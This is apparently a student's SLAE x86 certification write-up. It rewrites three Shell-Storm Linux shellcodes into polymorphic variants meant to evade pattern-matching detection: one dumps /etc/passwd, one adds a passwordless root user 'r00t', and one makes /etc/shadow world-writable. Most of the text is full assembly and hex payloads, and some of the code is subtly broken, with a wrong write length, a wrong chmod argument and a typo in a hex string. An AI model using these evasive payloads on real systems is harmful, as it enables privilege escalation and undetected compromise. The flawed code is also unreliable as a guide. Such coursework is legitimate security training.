SLAEx86 - Assignment 6
The sixth assignment for the SLAEx86 certification includes the following requirements:
- Take up 3 shellcodes from Shell-Storm and create polymorphic versions of them to beat pattern matching
- The polymorphic versions cannot be larger 150% of the existing shellcode
- Bonus points for making it shorter in length than original
Shellcode 1: /bin/cat /etc/passwd
Source: http://shell-storm.org/shellcode/files/shellcode-571.php
Size: 43 bytes
Original code, shellcode and assembly code:
#include <stdio.h>#include <stdio.h>
const char shellcode[]="\x31\xc0" // xorl %eax,%eax
"\x99" // cdq
"\x52" // push edx
"\x68\x2f\x63\x61\x74" // push dword 0x7461632f
"\x68\x2f\x62\x69\x6e" // push dword 0x6e69622f
"\x89\xe3" // mov ebx,esp
"\x52" // push edx
"\x68\x73\x73\x77\x64" // pu sh dword 0x64777373
"\x68\x2f\x2f\x70\x61" // push dword 0x61702f2f
"\x68\x2f\x65\x74\x63" // push dword 0x6374652f
"\x89\xe1" // mov ecx,esp
"\xb0\x0b" // mov $0xb,%al
"\x52" // push edx
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx,esp
"\xcd\x80" ; // int 80h
int main()
{(*(void (*)()) shellcode)();
return 0;
}
/*shellcode[]= "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64"
"\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";
*/
\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80
global _start
section .text
_start:
xor eax,eax
cdq
push edx
; push dword 0x7461632f
; push dword 0x6e69622f
mov esi, 0x6350521e
add esi, 0x11111111
mov dword [esp-4], esi
mov edi, 0x5d58511e
add edi, 0x11111111
mov dword [esp-8], edi
sub esp, 8
mov ebx,esp
push edx
; push dword 0x64777373
mov esi, 0x75888484
sub esi, 0x11111111
mov dword [esp-4], esi
sub esp, 4
push dword 0x61702f2f
push dword 0x6374652f
mov ecx,esp
mov al,0xb
push edx
push ecx
push ebx
mov ecx,esp
int 0x80
Polymorphic assembly code with comments:
; Filename - bin_cat.nasm
; Purpose - displays the contents of the /etc/passwd file using the /bin/cat command
; Source - http://shell-storm.org/shellcode/files/shellcode-571.php
global _start
section .text
_start:
sub eax, eax ; set eax = 0
push eax ; put 0 to the stack
mov eax, 0x74612f63 ; put ta/c into eax
xchg al, ah ; swap bytes to correct order
mov dword [esp-4], eax ; place tac/ into esp-4
mov edx, 0x6e692f62 ; put ni/b into edx
xchg dl, dh ; swap bytes to correct order
mov dword [esp-8], edx ; place nib/ into esp-8
sub esp, 8 ; offset esp by 8
mov ebx, esp ; set stack value /bin/cat into ebx
xor eax, eax ; set eax = 0
xor edx, edx ; set edx = 0
push eax ; put 0 to stack
mov esi, 0x323bb9b9 ; dwss rotated right 1
rol esi, 1 ; rotate values left 1
inc esi ; increment esi by 1
mov dword [esp-4], esi ; place dwss into esp-4
mov ebp, 0x30b81797 ; ap// rotated right 1
rol ebp, 1 ; rotate values left 1
inc ebp ; increment ebp by 1
mov dword [esp-8], ebp ; place ap// into esp-8
mov edi, 0x31ba3297 ; cte/ rotated right 1
rol edi, 1 ; rotate values left 1
inc edi ; increment edi by 1
mov dword [esp-12], edi ; place cte/ into esp-12
sub esp, 12 ; offset esp by 12
mov ecx, esp ; set stack value /etc/passwd into ecx
push edx ; push 0 to stack
push ecx ; push /etc/passwd to stack
push ebx ; push /bin/cat to stack
mov ecx, esp ; place final command into ecx
mov al, 0xb ; set eax to execve syscall
int 0x80 ; call execve syscall
Original shellcode:
\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80
Polymorphic shellcode:
\x29\xc0\x50\xb8\x63\x2f\x61\x74\x86\xc4\x89\x44\x24\xfc\xba\x62\x2f\x69\x6e\x86\xd6\x89\x54\x24\xf8\x83\xec\x08\x89\xe3\x31\xc0\x31\xd2\x50\xbe\xb9\xb9\x3b\x32\xd1\xc6\x46\x89\x74\x24\xfc\xbd\x97\x17\xb8\x30\xd1\xc5\x45\x89\x6c\x24\xf8\xbf\x97\x32\xba\x31\xd1\xc7\x47\x89\x7c\x24\xf4\x83\xec\x0c\x89\xe1\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80
Final size of polymorphic shellcode: 85 bytes
Shellcode 2: Add root user ‘r00t’ with no password to /etc/passwd
Source: http://shell-storm.org/shellcode/files/shellcode-211.php
Size: 69 bytes
Original code, shellcode and assembly code:
/* By Kris Katterjohn 11/14/2006
*
* 69 byte shellcode to add root user 'r00t' with no password to /etc/passwd
*
* for Linux/x86
*
*
*
* section .text
*
* global _start
*
* _start:
*
* ; open("/etc//passwd", O_WRONLY | O_APPEND)
*
* push byte 5
* pop eax
* xor ecx, ecx
* push ecx
* push 0x64777373
* push 0x61702f2f
* push 0x6374652f
* mov ebx, esp
* mov cx, 02001Q
* int 0x80
*
* mov ebx, eax
*
* ; write(ebx, "r00t::0:0:::", 12)
*
* push byte 4
* pop eax
* xor edx, edx
* push edx
* push 0x3a3a3a30
* push 0x3a303a3a
* push 0x74303072
* mov ecx, esp
* push byte 12
* pop edx
* int 0x80
*
* ; close(ebx)
*
* push byte 6
* pop eax
* int 0x80
*
* ; exit()
*
* push byte 1
* pop eax
* int 0x80
*/
main()
{
char shellcode[] =
"\x6a\x05\x58\x31\xc9\x51\x68\x73\x73\x77\x64\x68"
"\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x66"
"\xb9\x01\x04\xcd\x80\x89\xc3\x6a\x04\x58\x31\xd2"
"\x52\x68\x30\x3a\x3a\x3a\x68\x3a\x3a\x30\x3a\x68"
"\x72\x30\x30\x74\x89\xe1\x6a\x0c\x5a\xcd\x80\x6a"
"\x06\x58\xcd\x80\x6a\x01\x58\xcd\x80";
(*(void (*)()) shellcode)();
}
Polymorphic assembly code with comments:
; Filename - r00tuser.nasm
; Purpose - adds a root user 'r00t' with no password to /etc/passwd
; Source - http://shell-storm.org/shellcode/files/shellcode-211.php
global _start
section .text
_start:
; open syscall --> ("/etc//passwd", O_WRONLY | 0_APPEND)
xor eax, eax ; clear eax to 0
mov al, 0x5 ; set eax to open syscall
sub ecx, ecx ; set ecx to 0
push ecx ; ecx = 0 to stack
mov esi, 0x73737764 ; dwss reversed (sswd)
bswap esi ; swap bytes back to 0x64777373
mov dword [esp-4], esi ; set value to esp-4
mov edi, 0x2f2f7061 ; ap// reversed (//pa)
bswap edi ; swap bytes back to 0x61702f2f
mov dword [esp-8], edi ; set value to esp-8
mov ebp, 0x2f657463 ; cte/ reversed (/etc)
bswap ebp ; swap bytes back to 0x6374652f
mov dword [esp-12], ebp ; set value to esp-12
sub esp, 12 ; adjust stack pointer by 12
mov ebx, esp ; set value of ebx to /etc//passwd
mov dx, 0x3e1 ; set edi to 20 less than 0x401
add edx, 0x20 ; set edi to 0x401 value
mov ecx, edx ; set 0x401 into ecx
int 0x80 ; call open syscall --> ("/etc//passwd", O_WRONLY | 0_APPEND)
mov ebx, eax ; save file descriptor in ebx
xor edx, edx ; clear edx to 0
; write syscall --> (ebx file descriptor, "r00t::0:0:::", 12)
xor eax, eax ; clear eax to 0
mov al, 0x4 ; set eax to write syscall
push edx ; edx = 0 to stack
xor esi, esi ; clear esi to 0
xor edi, edi ; clear edi to 0
xor ebp, ebp ; clear ebp to 0
mov esi, 0x303a3a3a ; :::0 reversed (0:::)
bswap esi ; swap bytes back to 0x3a3a3a30
mov dword [esp-4], esi ; set value to esp-4
mov edi, 0x3a3a303a ; :0:: reversed (::0:)
bswap edi ; swap bytes back to 0x3a303a3a
mov dword [esp-8], edi ; set value to esp-8
mov ebp, 0x72303074 ; t00r reversed (r00t)
bswap ebp ; swap bytes back to 0x74303072
mov dword [esp-12], ebp ; set value to esp-12
sub esp, 12
mov ecx, esp ; move esp ("r00t::0:0:::") into ecx
mov dl, 0x12 ; move the value of 12 into edx
int 0x80 ; call write syscall --> (ebx file descriptor, "r00t::0:0:::", 12)
; close and exit program
xor eax, eax ; clear eax to 0
mov al, 0x6 ; set eax to close syscall
int 0x80 ; call close syscall
xor eax, eax ; clear eax to 0
mov al, 0x1 ; set eax to exit syscall
int 0x80 ; call exit syscall --> close program
Original shellcode:
\x6a\x05\x58\x31\xc9\x51\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\x01\x04\xcd\x80\x89\xc3\x6a\x04\x58\x31\xd2\x52\x68\x30\x3a\x3a\x3a\x68\x3a\x3a\x30\x3a\x68\x72\x30\x30\x74\x89\xe1\x6a\x0c\x5a\xcd\x80\x6a\x06\x58\xcd\x80\x6a\x01\x58\xcd\x80
Polymorphic shellcode:
\x31\xc0\xb0\x05\x29\xc9\x51\xbe\x64\x77\x73\x73\x0f\xce\x89\x74\x24\xfc\xbf\x61\x70\x2f\x2f\x0f\xcf\x89\x7c\x24\xf8\xbd\x63\x74\x65\x2f\x0f\xcd\x89\x6c\x24\xf4\x83\xec\x0c\x89\xe3\x66\xba\xe1\x03\x83\xc2\x20\x89\xd1\xcd\x80\x89\xc3\x31\xd2\x31\xc0\xb0\x04\x52\x31\xf6\x31\xff\x31\xed\xbe\x3a\x3a\x3a\x30\x0f\xce\x89\x74\x24\xfc\xbf\x3a\x30\x3a\x3a\x0f\xcf\x89\x7c\x24\xf8\xbd\x74\x30\x30\x72\x0f\xcd\x89\x6c\x24\xf4\x83\xec\x0c\x89\xe1\xb2\x12\xcd\x80\x31\xc0\xb0\x06\xcd\x80\x31\xc0\xb0\x01\xcd\x80
Final size of polymorphic shellcode: 125 bytes
Executing the new shellcode adds the new ‘r00t‘ user into the /etc/passwd file:
Shellcode 3: chmod /etc/shadow to 0666
Source: http://shell-storm.org/shellcode/files/shellcode-210.php
Size: 36 bytes
Original code, shellcode and assembly code:
/* By Kris Katterjohn 8/29/2006
*
* 36 byte shellcode to chmod("/etc/shadow", 0666) and exit for Linux/x86
*
* To remove exit(): Remove the last 5 bytes (0x6a - 0x80)
*
*
*
* section .text
*
* global _start
*
* _start:
* xor edx, edx
*
* push byte 15
* pop eax
* push edx
* push byte 0x77
* push word 0x6f64
* push 0x6168732f
* push 0x6374652f
* mov ebx, esp
* push word 0666Q
* pop ecx
* int 0x80
*
* push byte 1
* pop eax
* int 0x80
*/
main()
{
char shellcode[] =
"\x31\xd2\x6a\x0f\x58\x52\x6a\x77\x66\x68\x64\x6f\x68"
"\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\x68"
"\xb6\x01\x59\xcd\x80\x6a\x01\x58\xcd\x80";
(*(void (*)()) shellcode)();
}
Polymorphic assembly code with comments:
; Filename - shadow.nasm
; Purpose - change permission of /etc/shadow file to 666
; Source - http://shell-storm.org/shellcode/files/shellcode-210.php
global _start
section .text
_start:
sub eax, eax ; set eax to 0
push eax ; push first null dword to stack
mov esi, 0x776f6411 ; woda - 50 hex (80 decimal)
mov edi, 0x68732f5f ; hs// + 30 hex (48 decimal)
mov ebp, 0x63746544 ; cte/ + 15 hex (21 decimal)
add esi, 80
sub edi, 48
sub ebp, 21
mov dword [esp-4], esi
mov dword [esp-8], edi
mov dword [esp-12], ebp
sub esp, 12
mov ebx, esp ; set ebx to /etc//shadow
push word 0x1b6 ; push 666 to stack
mov ecx, esp ; set ecx to 666
mov al, 0xf ; set chmod syscall to al
int 0x80 ; call chmod syscall
Original shellcode:
\x31\xd2\x6a\x0f\x58\x52\x6a\x77\x66\x68\x64\x6f\x68\x2f\x73\x68\x61\68\x2f\x65\x74\x63\x89\xe3\x66\x68\xb6\x01\x59\xcd\x80\x6a\x01\x58\xcd\x80
Polymorphic shellcode:
\x29\xc0\x50\xbe\x11\x64\x6f\x77\xbf\x5f\x2f\x73\x68\xbd\x44\x65\x74\x63\x83\xc6\x50\x83\xef\x30\x83\xed\x15\x89\x74\x24\xfc\x89\x7c\x24\xf8\x89\x6c\x24\xf4\x83\xec\x0c\x89\xe3\x66\x68\xb6\x01\x89\xe1\xb0\x0f\xcd\x80
Final size of polymorphic shellcode: 54 bytes
After executing the shellcode and verifying the permissions of the /etc/shadow file were changed I was able to open the file as a regular user account:
